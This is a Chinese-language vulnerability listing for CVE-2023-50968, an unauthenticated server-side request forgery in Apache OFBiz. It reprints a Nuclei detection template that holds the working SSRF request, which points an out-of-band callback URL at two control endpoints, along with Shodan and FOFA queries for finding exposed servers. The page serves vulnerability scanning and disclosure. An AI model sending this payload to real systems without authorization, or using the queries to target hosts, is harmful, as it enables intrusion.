CVE-2023-50968: Apache OFBiz < 18.12.11 - Server Side Request Forgery

日期: 2025-08-01 | 影响软件: Apache OFBiz | POC: 已公开

漏洞描述

Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.

PoC代码[已公开]

id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
    - https://issues.apache.org/jira/browse/OFBIZ-12875
    - https://ofbiz.apache.org/download.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50968
    cwe-id: CWE-918,CWE-200
    epss-score: 0.81592
    epss-percentile: 0.99142
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2023,apache,ofbiz,ssrf,vkev
variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}

    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray

      parameter:
        - requiredLabel
        - requiredLabels

    attack: clusterbomb
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4b0a00483046022100c8f1bae577422c3c979e5c969d5a44bc00e063b1e0b8d39bbbdc1e7b6338d9b8022100ba7116a88e76e46c841658e6872dfda8afcb75b9a06cc73432e2aa62e8a67dd1:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-50968.yaml

相关漏洞推荐